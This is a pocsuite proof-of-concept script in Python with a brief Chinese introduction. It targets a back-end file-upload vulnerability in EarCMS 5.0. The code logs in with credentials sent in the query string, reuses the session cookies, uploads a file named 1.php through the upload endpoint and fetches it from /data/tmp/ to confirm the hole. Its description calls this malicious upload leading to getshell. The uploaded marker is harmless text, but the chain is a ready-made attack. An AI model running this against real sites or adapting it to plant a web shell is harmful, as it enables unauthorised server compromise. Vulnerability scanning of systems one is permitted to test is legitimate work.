EarCMS后台文件上传漏洞,pocsuite3检测脚本,内容为python编写的模拟登录后,通过cookie来上传文件,刚学习python不久,希望可以有更多的学习机会
# coding: utf-8
import json
from urllib import parse as urlparse
from urllib.parse import urljoin

from pocsuite.api.poc import Output, POCBase
from pocsuite.api.poc import register
from pocsuite.api.request import req
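class TestPOC(POCBase):
    """Verification-only check for the EarCMS back-end file upload issue.

    ``_verify`` logs in with the account configured in ``_LOGIN_PATH``, keeps
    the session cookies the server hands back, uploads a small marker file and
    then checks whether that marker is served from ``/data/tmp/``.  ``_attack``
    simply delegates to ``_verify``; there is no separate attack mode.

    The class is registered with pocsuite at module level (see bottom of file).
    """

    vulID = '12763'
    version = '5.0'
    author = 'marry'
    vulDate = '2019-05-13'
    createDate = '2019-09-29'
    updateDate = '2019-09-29'
    references = ['https://xz.aliyun.com/t/5873']
    name = 'EarCMS后台文件上传'
    appPowerLink = 'http://www.earcms.net/'
    appName = 'earcms'
    appVersion = '5.0'
    vulType = 'file upload'
    desc = '''
Front Register Account, Malicious File Upload, getshell
'''

    # Headers sent with every request of the check.
    _HEADERS = {
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0'
    }
    # Login endpoint.  Replace mail/pwd with a dedicated test account: the
    # credentials travel in the query string and will show up in server and
    # proxy logs.
    _LOGIN_PATH = '/source/index/ajax.php?ac=login&[email protected]&pwd=xxxx'
    # Upload endpoint; it expects a ``time`` form field next to the file.
    _UPLOAD_PATH = '/source/pack/upload/index-uplog.php'
    _UPLOAD_TIME = '1-1569738560'
    # Content of the uploaded marker file; its presence in the fetched file
    # is what decides the verdict.
    _MARKER = '123'
    # Cookies the login response must set for the session to be usable.
    _SESSION_COOKIES = ('PHPSESSID', 'in_userid', 'in_username', 'in_userpassword')

    def _check(self, url):
        """Run the login/upload/fetch sequence against *url*.

        Args:
            url: ``scheme://host:port`` of the target; used only for fetching
                the uploaded file, the login and upload URLs are built from
                ``self.url``.

        Returns:
            ``(True, body)`` when the marker is served back, otherwise
            ``(False, reason)``.  Transport errors are not caught here.
        """
        # Step 1: log in and keep the session cookies the server sets.
        login_url = urljoin(self.url, self._LOGIN_PATH)
        res = req.get(url=login_url, headers=self._HEADERS)
        try:
            cookies = {key: res.cookies[key] for key in self._SESSION_COOKIES}
        except KeyError:
            # Login did not succeed (bad credentials or changed cookie names).
            return (False, 'login_failed')

        # Step 2: upload the marker file together with the required ``time`` field.
        upload_url = urljoin(self.url, self._UPLOAD_PATH)
        files = {'app': ('1.php', self._MARKER, 'application/octet-stream')}
        data = {"time": self._UPLOAD_TIME}
        r = req.post(upload_url, headers=self._HEADERS, cookies=cookies, files=files, data=data)
        if self._UPLOAD_TIME not in r.text:
            return (False, 'no_upload_file')

        # The response body is attacker-controlled from the scanner's point of
        # view: parse it as JSON instead of eval()-ing it so a hostile or
        # compromised target cannot execute code on the scanning host.
        try:
            stored_name = json.loads(r.text)['time']
        except (ValueError, KeyError, TypeError):
            return (False, 'unexpected_response')
        if not isinstance(stored_name, str):
            return (False, 'unexpected_response')

        # Step 3: confirm the marker file is reachable under the returned name.
        fetch_url = url + '/data/tmp/' + stored_name + '.php'
        response = req.get(fetch_url, headers=self._HEADERS)
        if self._MARKER in response.text:
            return (True, response.text)
        return (False, 'no_upload_file')

    def _verify(self):
        """Probe the target and return the result wrapped in an ``Output``.

        Only the port given in ``self.url`` is probed; when none is given the
        check falls back to port 80 (also for https targets, as in the
        original script).
        """
        result = {}
        pr = urlparse.urlparse(self.url)
        ports = [pr.port] if pr.port else [80]
        for port in ports:
            url = '{}://{}:{}'.format(pr.scheme, pr.hostname, port)
            try:
                status, msg = self._check(url)
            except Exception:
                # Best effort: a transport or parsing error on one port counts
                # as "not verified" rather than aborting the whole scan.  Bare
                # ``except`` is avoided so Ctrl-C still stops the run.
                continue
            if status:
                result['VerifyInfo'] = {'URL': url, 'payload': msg}
        return self.parse_output(result)

    def _attack(self):
        """No separate attack mode: attacking is identical to verifying."""
        return self._verify()

    def parse_output(self, result):
        """Wrap *result* in the standard pocsuite ``Output`` object.

        An empty *result* is reported as a failure.
        """
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('not vulnerability')
        return output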
# Register the PoC class with the pocsuite framework (the framework discovers
# it through this call; nothing in the class runs at import time).
register(TestPOC)